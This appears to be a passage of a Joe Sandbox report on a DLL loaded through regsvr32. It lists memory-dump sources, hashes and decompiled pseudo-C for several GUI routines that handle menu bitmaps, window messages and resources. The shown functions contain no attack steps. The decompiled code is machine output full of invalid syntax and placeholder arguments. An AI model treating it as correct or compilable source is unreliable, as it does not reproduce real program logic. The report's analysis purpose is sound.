                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Global$LockMessageParamPostReuseUnlock
                                                                              • String ID:
                                                                              • API String ID: 1233369038-0
                                                                              • Opcode ID: 26f65db6c2ab1d630243bf054f5fdd5a30bdcb6f9837613b5e4761d60a68f110
                                                                              • Instruction ID: 30ba36e7a3ae45f1da5093277bda313e9e91530f916d8d4c96e825a8f5d095de
                                                                              • Opcode Fuzzy Hash: 26f65db6c2ab1d630243bf054f5fdd5a30bdcb6f9837613b5e4761d60a68f110
                                                                              • Instruction Fuzzy Hash: 5B418136704E8182DB10DB36E84129D73A0FB95BE4F548625EF6E87799EF38C845C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000ACF0 Relevance: 6.1, APIs: 4, Instructions: 123windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 26%
                                                                              			E1000ACF0(void* __ecx, void* __edx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r9, void* __r12) {
				unsigned int _t28;
				int _t32;
				signed int _t48;
				signed int _t51;
				signed int _t54;
				unsigned int _t60;
				void* _t61;
				unsigned int _t62;
				signed int _t63;
				signed long long _t74;
				long long _t76;
				long long _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				char* _t89;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t96;
				signed long long _t97;
				void* _t98;
				void* _t103;
				signed char* _t104;
				signed long long _t105;
				void* _t106;

				_t107 = __r12;
				_t103 = __r9;
				_t92 = __rsi;
				_t90 = __rdi;
				_t88 = __rdx;
				_t52 = __edx;
				_t49 = __ecx;
				_push(_t94);
				_push(__rsi);
				_push(__rdi);
				_push(__r12);
				_t97 = _t96 - 0xc0;
				_t74 =  *0x1006f4c8; // 0x6f13091946cb
				 *(_t97 + 0xb0) = _t74 ^ _t97;
				_t28 = GetMenuCheckMarkDimensions();
				_t62 = _t28;
				_t60 = _t28 >> 0x10;
				if(_t62 <= 4 || _t60 <= 5) {
					E10016544();
					asm("int3");
					asm("int3");
					asm("int3");
					_t98 = _t97 - 0x30;
					_t102 =  *_t80;
					_t79 = _t80;
					_t54 = 0 | _t52 != 0x00000000;
					_t32 =  *((intOrPtr*)( *_t80 + 8))(_t78);
					if( *((long long*)(_t79 + 0x10)) != 0 &&  *((long long*)(_t79 + 0x18)) == 0) {
						if( *((intOrPtr*)(_t79 + 0xc)) >=  *((intOrPtr*)(_t79 + 0x30))) {
							E10016544();
							asm("int3");
						}
						_t76 =  *0x10074cf0; // 0x0
						if(_t76 != 0) {
							L13:
							r9d = 0;
							r8d = 0x400;
							 *((long long*)(_t98 + 0x20)) = _t76;
							_t32 = SetMenuItemBitmaps(??, ??, ??, ??, ??);
						} else {
							_t32 = E1000ACF0(_t49, _t54, _t88, _t90, _t92, _t102, _t103, _t107);
							_t76 =  *0x10074cf0; // 0x0
							if(_t76 != 0) {
								goto L13;
							}
						}
					}
					return _t32;
				} else {
					_t2 = _t90 + 0x1b; // 0x20
					r8d = _t2;
					_t63 =  >  ? r8d : _t62;
					asm("cdq");
					_t48 = _t94 + 0xf >> 4;
					r12d = _t48;
					r12d = r12d << 4;
					r12d = r12d + (_t94 - 4 - __edx >> 1);
					_t6 = _t90 + 7; // 0xc
					r12d = r12d - _t63;
					r12d =  >  ? _t6 : r12d;
					_t61 =  >  ? r8d : _t60;
					_t7 = _t90 + 0x7b; // 0x80
					r8d = _t7;
					E1003A240(_t6, __ecx, 0xff, _t97 + 0x30, __rdx, __r8);
					_t105 = _t48;
					_t104 = 0x10055060;
					_t106 = _t105 + _t105;
					_t89 = _t97 + 0x30 + (__rsi - 6 >> 1) * _t105 * 2;
					do {
						r9d =  *_t104 & 0x000000ff;
						_t104 =  &(_t104[1]);
						r9w = r9w << r12d;
						r9w =  !r9w;
						 *((intOrPtr*)(_t89 + 1)) = r9b;
						 *_t89 = (r9w & 0xffffffff) >> 8;
						_t89 = _t89 + _t106;
						_t90 = _t90 - 1;
					} while (_t90 != 0);
					_t13 = _t90 + 1; // 0x5
					r9d = _t13;
					_t77 = _t97 + 0x30;
					r8d = r9d;
					_t51 = _t63;
					 *((long long*)(_t97 + 0x20)) = _t77;
					CreateBitmap(??, ??, ??, ??, ??);
					 *0x10074cf0 = _t77;
					if(_t77 == 0) {
						_t51 = 0;
						LoadBitmapW(??, ??);
						 *0x10074cf0 = _t77;
					}
					return E10038D20(_t51,  *(_t97 + 0xb0) ^ _t97);
				}
			}





























                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf0
                                                                              0x1000acf2
                                                                              0x1000acf3
                                                                              0x1000acf4
                                                                              0x1000acf5
                                                                              0x1000acf7
                                                                              0x1000acfe
                                                                              0x1000ad08
                                                                              0x1000ad10
                                                                              0x1000ad16
                                                                              0x1000ad1f
                                                                              0x1000ad22
                                                                              0x1000ae20
                                                                              0x1000ae25
                                                                              0x1000ae26
                                                                              0x1000ae27
                                                                              0x1000ae2a
                                                                              0x1000ae2e
                                                                              0x1000ae37
                                                                              0x1000ae3a
                                                                              0x1000ae3d
                                                                              0x1000ae46
                                                                              0x1000ae55
                                                                              0x1000ae57
                                                                              0x1000ae5c
                                                                              0x1000ae5c
                                                                              0x1000ae5d
                                                                              0x1000ae67
                                                                              0x1000ae7a
                                                                              0x1000ae81
                                                                              0x1000ae88
                                                                              0x1000ae8e
                                                                              0x1000ae93
                                                                              0x1000ae69
                                                                              0x1000ae69
                                                                              0x1000ae6e
                                                                              0x1000ae78
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000ae78
                                                                              0x1000ae67
                                                                              0x1000ae9e
                                                                              0x1000ad35
                                                                              0x1000ad35
                                                                              0x1000ad35
                                                                              0x1000ad41
                                                                              0x1000ad4b
                                                                              0x1000ad4c
                                                                              0x1000ad51
                                                                              0x1000ad5b
                                                                              0x1000ad5f
                                                                              0x1000ad62
                                                                              0x1000ad65
                                                                              0x1000ad6b
                                                                              0x1000ad72
                                                                              0x1000ad76
                                                                              0x1000ad76
                                                                              0x1000ad7a
                                                                              0x1000ad7f
                                                                              0x1000ad87
                                                                              0x1000ad95
                                                                              0x1000ad98
                                                                              0x1000ad9d
                                                                              0x1000ad9d
                                                                              0x1000ada4
                                                                              0x1000ada8
                                                                              0x1000adac
                                                                              0x1000adb4
                                                                              0x1000adbc
                                                                              0x1000adbe
                                                                              0x1000adc1
                                                                              0x1000adc1
                                                                              0x1000adc7
                                                                              0x1000adc7
                                                                              0x1000adcb
                                                                              0x1000add2
                                                                              0x1000add5
                                                                              0x1000add7
                                                                              0x1000addc
                                                                              0x1000ade5
                                                                              0x1000adec
                                                                              0x1000adf3
                                                                              0x1000adf5
                                                                              0x1000adfb
                                                                              0x1000adfb
                                                                              0x1000ae1f
                                                                              0x1000ae1f

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: BitmapMenu$BitmapsCheckCreateDimensionsItemLoadMark
                                                                              • String ID:
                                                                              • API String ID: 527726921-0
                                                                              • Opcode ID: 77ba0d8baff68cf573ac77b64cb874a347af9d26157eec2c950bc685f52596e4
                                                                              • Instruction ID: 893352e5eea9b5499c20d40cabad29cb5117c19ab53d5a85fa5d2acf0933bf4d
                                                                              • Opcode Fuzzy Hash: 77ba0d8baff68cf573ac77b64cb874a347af9d26157eec2c950bc685f52596e4
                                                                              • Instruction Fuzzy Hash: EA412232B11B8586E711CB25F844B9E33A2FB48B85F424126CB8A47B18EF3CE9D4C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002C7A0 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 36%
                                                                              			E1002C7A0(signed int __edx, void* __rcx, long long _a8, intOrPtr _a12) {
				char _v72;
				long long _v88;
				long long _v96;
				long long _v104;
				int _t39;
				int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				signed int _t52;
				long long _t63;
				long long _t65;
				void* _t70;
				void* _t72;
				long long _t73;
				void* _t76;
				void* _t78;
				void* _t80;
				long long _t81;
				long long _t82;
				long long _t83;

				_t63 = _t73;
				_t72 = __rcx;
				_t47 = __edx;
				 *((intOrPtr*)(_t63 + 0x40)) = 1;
				 *((intOrPtr*)(_t63 + 0x44)) = 1;
				GetStockObject(??);
				E1000CE2C(_t63, _t63);
				_t83 = _t63;
				E10029FD8(_t70, _t76, _t78);
				_t49 =  *(_t72 + 0x84);
				_t52 = 0xa000;
				_t81 = _t83;
				_t82 = _t63;
				if((0x0000a000 & _t49) == 0) {
					if((0x00005000 & _t49) == 0) {
						_t39 = GetSystemMetrics();
						_t49 = 0x21;
						_a8 = _t39 - 1;
						_t41 = GetSystemMetrics(??);
						_t52 = 0xa000;
						_a12 = _t41 - 1;
						_t43 =  *(_t72 + 0x88);
						if((0x0000a000 & _t43) == 0 ||  *((intOrPtr*)(_t72 + 0x8c)) != 0) {
							if((0x00005000 & _t43) == 0 ||  *((intOrPtr*)(_t72 + 0x8c)) == 0) {
								asm("movdqu xmm0, [esi+0x5c]");
							} else {
								goto L8;
							}
						} else {
							L8:
							asm("movdqu xmm0, [esi+0x4c]");
						}
						_t81 = _t82;
					} else {
						asm("movdqu xmm0, [esi+0x3c]");
					}
				} else {
					asm("movdqu xmm0, [esi+0x2c]");
				}
				asm("movdqu [esp+0x40], xmm0");
				if(_t47 != 0) {
					_a12 = 0;
					_a8 = 0;
				}
				_t44 =  *(_t72 + 0x84);
				if((_t52 & _t44) != 0 || (0x00005000 & _t44) != 0) {
					r8d = 0xffffffff;
					InflateRect(??, ??, ??);
				}
				_t65 = _a8;
				_t84 =  !=  ? _t82 : _t83;
				_v88 =  !=  ? _t82 : _t83;
				_v96 = _t81;
				_v104 =  *((intOrPtr*)(_t72 + 0x20));
				_t46 = E1002A0B0(_t47, _t49,  *((intOrPtr*)(_t72 + 0x98)),  &_v72, _t65, _t72 + 0x10, _t80);
				asm("movdqu xmm5, [esp+0x40]");
				 *((long long*)(_t72 + 0x20)) = _t65;
				asm("movdqu [esi+0x10], xmm5");
				bpl = _t81 == _t82;
				 *((intOrPtr*)(_t72 + 0x28)) = 0;
				return _t46;
			}


























                                                                              0x1002c7ab
                                                                              0x1002c7b2
                                                                              0x1002c7b7
                                                                              0x1002c7b9
                                                                              0x1002c7c0
                                                                              0x1002c7c7
                                                                              0x1002c7d0
                                                                              0x1002c7d5
                                                                              0x1002c7d8
                                                                              0x1002c7dd
                                                                              0x1002c7e3
                                                                              0x1002c7ea
                                                                              0x1002c7ef
                                                                              0x1002c7f7
                                                                              0x1002c802
                                                                              0x1002c810
                                                                              0x1002c816
                                                                              0x1002c81e
                                                                              0x1002c825
                                                                              0x1002c82b
                                                                              0x1002c833
                                                                              0x1002c83a
                                                                              0x1002c842
                                                                              0x1002c84e
                                                                              0x1002c85f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002c858
                                                                              0x1002c858
                                                                              0x1002c858
                                                                              0x1002c858
                                                                              0x1002c864
                                                                              0x1002c804
                                                                              0x1002c804
                                                                              0x1002c804
                                                                              0x1002c7f9
                                                                              0x1002c7f9
                                                                              0x1002c7f9
                                                                              0x1002c869
                                                                              0x1002c86f
                                                                              0x1002c871
                                                                              0x1002c878
                                                                              0x1002c878
                                                                              0x1002c87f
                                                                              0x1002c887
                                                                              0x1002c897
                                                                              0x1002c89a
                                                                              0x1002c89a
                                                                              0x1002c8a7
                                                                              0x1002c8b6
                                                                              0x1002c8be
                                                                              0x1002c8cb
                                                                              0x1002c8d0
                                                                              0x1002c8d5
                                                                              0x1002c8da
                                                                              0x1002c8e3
                                                                              0x1002c8e7
                                                                              0x1002c8ec
                                                                              0x1002c8f0
                                                                              0x1002c901

                                                                              APIs
                                                                              • GetStockObject.GDI32 ref: 1002C7C7
                                                                                • Part of subcall function 10029FD8: CreateBitmap.GDI32 ref: 1002A040
                                                                                • Part of subcall function 10029FD8: CreatePatternBrush.GDI32 ref: 1002A051
                                                                                • Part of subcall function 10029FD8: DeleteObject.GDI32 ref: 1002A061
                                                                              • InflateRect.USER32 ref: 1002C89A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                              • String ID:
                                                                              • API String ID: 3923860780-0
                                                                              • Opcode ID: 68bc530c77a9681378930545c353f9d8a39d62fa4a572d8c09c0ac51c130d1a6
                                                                              • Instruction ID: 73ae27856f3c637b53954e2a76a033cc00ef11862a90749ba495bd640e8bdda3
                                                                              • Opcode Fuzzy Hash: 68bc530c77a9681378930545c353f9d8a39d62fa4a572d8c09c0ac51c130d1a6
                                                                              • Instruction Fuzzy Hash: 92315C36A0078587D664CF6AF400B9AB7A1F789784F918219DFCA43B44EF78E484CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100128F0 Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E100128F0(void* __ebx, void* __ebp, void* __eflags, long long __rax, void* __rcx, void* __rdx, void* __r8, void* __r11) {
				signed short _t23;
				signed int _t30;
				void* _t32;
				void* _t38;
				void* _t40;
				long long _t48;
				long long _t49;
				long long _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t70;
				void* _t71;

				_t70 = __r11;
				_t67 = __r8;
				_t63 = __rdx;
				_t48 = __rax;
				_t40 = __eflags;
				_t32 = __ebx;
				 *((long long*)(_t66 + 0x30)) = 0xfffffffe;
				_t38 = r8d;
				_t71 = __rdx;
				_t65 = __rcx;
				E1000A9B4(_t66 + 0x40);
				E1000F9FC(_t40, _t48, _t66 + 0x80);
				GetTopWindow(??);
				_t64 = _t48;
				if(_t48 != 0) {
					do {
						 *((long long*)(_t66 + 0xc0)) = _t64;
						_t23 = GetDlgCtrlID(??);
						_t33 = _t23 & 0x0000ffff;
						 *(_t66 + 0x48) = _t23 & 0x0000ffff;
						_t49 = _t66 + 0x80;
						 *((long long*)(_t66 + 0x60)) = _t49;
						E10011844(_t32, _t23 & 0x0000ffff, _t38, _t49, _t64, _t63, _t70);
						if(_t49 == 0) {
							L3:
							 *((long long*)(_t66 + 0x20)) = 0;
							r8d = 0xffffffff;
							if(E1000A7C8(_t33,  *(_t66 + 0x48), _t38, _t49, _t65, _t63, _t67, _t66 + 0x40, _t70) == 0) {
								_t32 = _t38;
								if(_t38 != 0) {
									r9d = 0;
									r8d = 0;
									SendMessageW(??, ??, ??, ??);
									asm("dec eax");
									if(r8d < 0) {
										_t30 = E10016020(_t66 + 0x80) & 0x0000000f;
										__eflags = _t30 - 3;
										if(_t30 == 3) {
											L11:
											_t32 = 0;
											__eflags = 0;
										} else {
											__eflags = _t30 - 6;
											if(_t30 == 6) {
												goto L11;
											} else {
												__eflags = _t30 - 7;
												if(_t30 == 7) {
													goto L11;
												} else {
													__eflags = _t30 - 9;
													if(_t30 == 9) {
														goto L11;
													}
												}
											}
										}
									} else {
										_t32 = 0;
									}
								}
								r8d = _t32;
								_t63 = _t71;
								E1000A9E4(_t49, _t66 + 0x40, _t71);
							}
						} else {
							 *((long long*)(_t66 + 0x20)) = 0;
							r8d = 0xbd11ffff;
							if(E1000A7C8(_t33, 0, _t38, _t49, _t49, _t63, _t67, _t66 + 0x40, _t70) == 0) {
								goto L3;
							}
						}
						GetWindow();
						_t64 = _t49;
					} while (_t49 != 0);
				}
				 *((long long*)(_t66 + 0xc0)) = 0;
				return E10012484(_t66 + 0x80);
			}
















                                                                              0x100128f0
                                                                              0x100128f0
                                                                              0x100128f0
                                                                              0x100128f0
                                                                              0x100128f0
                                                                              0x100128f0
                                                                              0x100128fe
                                                                              0x10012907
                                                                              0x1001290a
                                                                              0x1001290d
                                                                              0x10012915
                                                                              0x10012922
                                                                              0x1001292c
                                                                              0x10012932
                                                                              0x10012938
                                                                              0x1001293e
                                                                              0x1001293e
                                                                              0x10012949
                                                                              0x1001294f
                                                                              0x10012952
                                                                              0x10012956
                                                                              0x1001295e
                                                                              0x10012966
                                                                              0x1001296e
                                                                              0x10012996
                                                                              0x10012996
                                                                              0x100129a4
                                                                              0x100129b8
                                                                              0x100129ba
                                                                              0x100129be
                                                                              0x100129c0
                                                                              0x100129c3
                                                                              0x100129d3
                                                                              0x100129d9
                                                                              0x100129de
                                                                              0x100129f1
                                                                              0x100129f4
                                                                              0x100129f7
                                                                              0x10012a08
                                                                              0x10012a08
                                                                              0x10012a08
                                                                              0x100129f9
                                                                              0x100129f9
                                                                              0x100129fc
                                                                              0x00000000
                                                                              0x100129fe
                                                                              0x100129fe
                                                                              0x10012a01
                                                                              0x00000000
                                                                              0x10012a03
                                                                              0x10012a03
                                                                              0x10012a06
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10012a06
                                                                              0x10012a01
                                                                              0x100129fc
                                                                              0x100129e0
                                                                              0x100129e0
                                                                              0x100129e0
                                                                              0x100129de
                                                                              0x10012a0a
                                                                              0x10012a0d
                                                                              0x10012a15
                                                                              0x10012a15
                                                                              0x10012970
                                                                              0x10012970
                                                                              0x10012980
                                                                              0x10012990
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10012990
                                                                              0x10012a22
                                                                              0x10012a28
                                                                              0x10012a2b
                                                                              0x1001293e
                                                                              0x10012a34
                                                                              0x10012a5a

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CtrlLongMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3707024519-0
                                                                              • Opcode ID: 479c6b95257da1bcd38aa8a0f505e149c318ac9aadbff4f21dec4684a58c769b
                                                                              • Instruction ID: 9f9a934969c1b81c28b980c979483ea7f32a9d02f99a1f21d9d5c3ea9d8a2de8
                                                                              • Opcode Fuzzy Hash: 479c6b95257da1bcd38aa8a0f505e149c318ac9aadbff4f21dec4684a58c769b
                                                                              • Instruction Fuzzy Hash: AA31F872315AC046EB71CB15E8507AE62A0FB857E4F500325EED98BB99DF3CC894C701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001E834 Relevance: 6.1, APIs: 4, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E1001E834(void* __ebx, signed int __edx, void* __eflags, intOrPtr __rax, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9) {
				intOrPtr _t27;
				void* _t38;
				signed int _t41;
				signed int _t42;
				intOrPtr _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				void* _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				void* _t69;

				_t67 = __r9;
				_t66 = __r8;
				_t63 = __rdx;
				_t53 = __rax;
				_t39 = __edx;
				_t38 = __ebx;
				_t69 = __r9;
				_t42 = r8d;
				_t41 = __edx;
				_t54 = __rcx;
				E10012674(__rcx);
				_t65 = _t53;
				if(_t53 == 0) {
					E10016544();
					asm("int3");
				}
				_t56 =  *((intOrPtr*)(_t54 + 0xe0));
				if(_t56 == 0) {
					L4:
					if(_t42 != 0xffff) {
						if(_t41 == 0 || (_t42 & 0x00000810) != 0) {
							 *(_t54 + 0x128) = 0;
						} else {
							if(_t64 - 0xf000 > 0x1ef) {
								if(_t41 < 0xff00) {
									 *(_t54 + 0x128) = _t41;
								} else {
									 *(_t54 + 0x128) = 0xef1f;
								}
							} else {
								 *(_t54 + 0x128) = (_t64 - 0xf000 >> 4) + 0xef00;
							}
						}
						 *(_t65 + 0x78) =  *(_t65 + 0x78) | 0x00000040;
					} else {
						 *(_t54 + 0x78) =  *(_t54 + 0x78) & 0xffffffbf;
						if( *((intOrPtr*)(_t65 + 0xc4)) != 0) {
							 *(_t54 + 0x128) = 0xe002;
						} else {
							 *(_t54 + 0x128) = 0xe001;
						}
						r8d =  *(_t54 + 0x128);
						r9d = 0;
						_t39 = 0x362;
						SendMessageW(??, ??, ??, ??);
						_t68 =  *_t54;
						 *((intOrPtr*)( *_t54 + 0x2a8))();
						if(_t53 != 0) {
							UpdateWindow();
						}
					}
					_t27 =  *((intOrPtr*)(_t54 + 0x12c));
					if( *(_t54 + 0x128) == _t27) {
						L22:
						return _t27;
					} else {
						GetParent();
						_t27 = E10011808(_t38, _t39, _t53, _t53, _t63, _t66, _t67, _t68);
						if(_t53 == 0) {
							goto L22;
						}
						r9d = 0;
						r8d = 0;
						return PostMessageW(??, ??, ??, ??);
					}
				}
				_t53 =  *_t56;
				_t67 = _t69;
				r8d = _t42;
				_t39 = _t41;
				_t27 =  *((intOrPtr*)(_t53 + 0xf8))();
				if(_t27 != 0) {
					goto L22;
				}
				goto L4;
			}















                                                                              0x1001e834
                                                                              0x1001e834
                                                                              0x1001e834
                                                                              0x1001e834
                                                                              0x1001e834
                                                                              0x1001e834
                                                                              0x1001e83f
                                                                              0x1001e842
                                                                              0x1001e845
                                                                              0x1001e847
                                                                              0x1001e84a
                                                                              0x1001e852
                                                                              0x1001e855
                                                                              0x1001e857
                                                                              0x1001e85c
                                                                              0x1001e85c
                                                                              0x1001e85d
                                                                              0x1001e867
                                                                              0x1001e882
                                                                              0x1001e888
                                                                              0x1001e8e6
                                                                              0x1001e92f
                                                                              0x1001e8f0
                                                                              0x1001e8fb
                                                                              0x1001e919
                                                                              0x1001e927
                                                                              0x1001e91b
                                                                              0x1001e91b
                                                                              0x1001e91b
                                                                              0x1001e8fd
                                                                              0x1001e90b
                                                                              0x1001e90b
                                                                              0x1001e8fb
                                                                              0x1001e939
                                                                              0x1001e88a
                                                                              0x1001e88a
                                                                              0x1001e895
                                                                              0x1001e8a3
                                                                              0x1001e897
                                                                              0x1001e897
                                                                              0x1001e897
                                                                              0x1001e8ad
                                                                              0x1001e8b8
                                                                              0x1001e8bb
                                                                              0x1001e8c0
                                                                              0x1001e8c6
                                                                              0x1001e8cc
                                                                              0x1001e8d6
                                                                              0x1001e8dc
                                                                              0x1001e8dc
                                                                              0x1001e8d6
                                                                              0x1001e93d
                                                                              0x1001e949
                                                                              0x1001e981
                                                                              0x1001e981
                                                                              0x1001e94b
                                                                              0x1001e94f
                                                                              0x1001e958
                                                                              0x1001e960
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001e966
                                                                              0x1001e969
                                                                              0x00000000
                                                                              0x1001e971
                                                                              0x1001e949
                                                                              0x1001e869
                                                                              0x1001e86c
                                                                              0x1001e86f
                                                                              0x1001e872
                                                                              0x1001e874
                                                                              0x1001e87c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$ParentPostSendUpdateWindow
                                                                              • String ID:
                                                                              • API String ID: 4141989945-0
                                                                              • Opcode ID: c9e0f15b872a5c2b669e5636b94b3d2a86d5455c93a238bdcef81181a79e1a7d
                                                                              • Instruction ID: ece8d54bae358058c5aab98e9087fe21629fe97961b56f42350a863daf7c7afe
                                                                              • Opcode Fuzzy Hash: c9e0f15b872a5c2b669e5636b94b3d2a86d5455c93a238bdcef81181a79e1a7d
                                                                              • Instruction Fuzzy Hash: 10316C32B016C686EBA5CF21D854BAD36A0FB88B99F294035CE494B654EF74DCD58B10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001C4EC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 66%
                                                                              			E1001C4EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, signed int _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				intOrPtr _t28;
				signed int _t32;
				intOrPtr _t33;
				signed int _t40;
				void* _t44;
				intOrPtr _t46;
				signed int* _t49;
				intOrPtr _t51;
				signed int* _t59;
				signed int* _t69;
				signed int* _t71;
				signed short* _t74;
				void* _t77;
				void* _t78;

				_t76 = __r11;
				_t72 = __r8;
				_t44 = __edi;
				_t38 = __ebx;
				_t78 = __rdx;
				_t77 = __rcx;
				E1000A57C(__ebx, __ecx, __edx, __esi, __rax, __r8, __r9, __r11);
				r8d = 0xf1;
				FindResourceW(??, ??, ??);
				if(__rax != 0) {
					LoadResource();
					__eflags = __rax;
					if(__rax == 0) {
						goto L1;
					}
					LockResource();
					__eflags = __rax;
					_t51 = __rax;
					if(__eflags == 0) {
						goto L1;
					}
					_t40 =  *(__rax + 6) & 0x0000ffff;
					_t49 =  <  ? 0xffffffff : __rax;
					E10009454(__eflags, _t49, _t49);
					r9d = 0;
					__eflags =  *(_t51 + 6) - r9w;
					_t71 = _t49;
					if( *(_t51 + 6) <= r9w) {
						L7:
						r8d =  *(_t51 + 6) & 0x0000ffff;
						_t28 = E1001ADF8(_t40, _t44, _t77, _t71, _t72);
						_t59 = _t71;
						_t46 = _t28;
						L10009490(_t49, _t59);
						__eflags = _t46;
						if(_t46 != 0) {
							_t32 =  *(_t51 + 2) & 0x0000ffff;
							_a24 = _t32;
							_t33 = _t32 + 7;
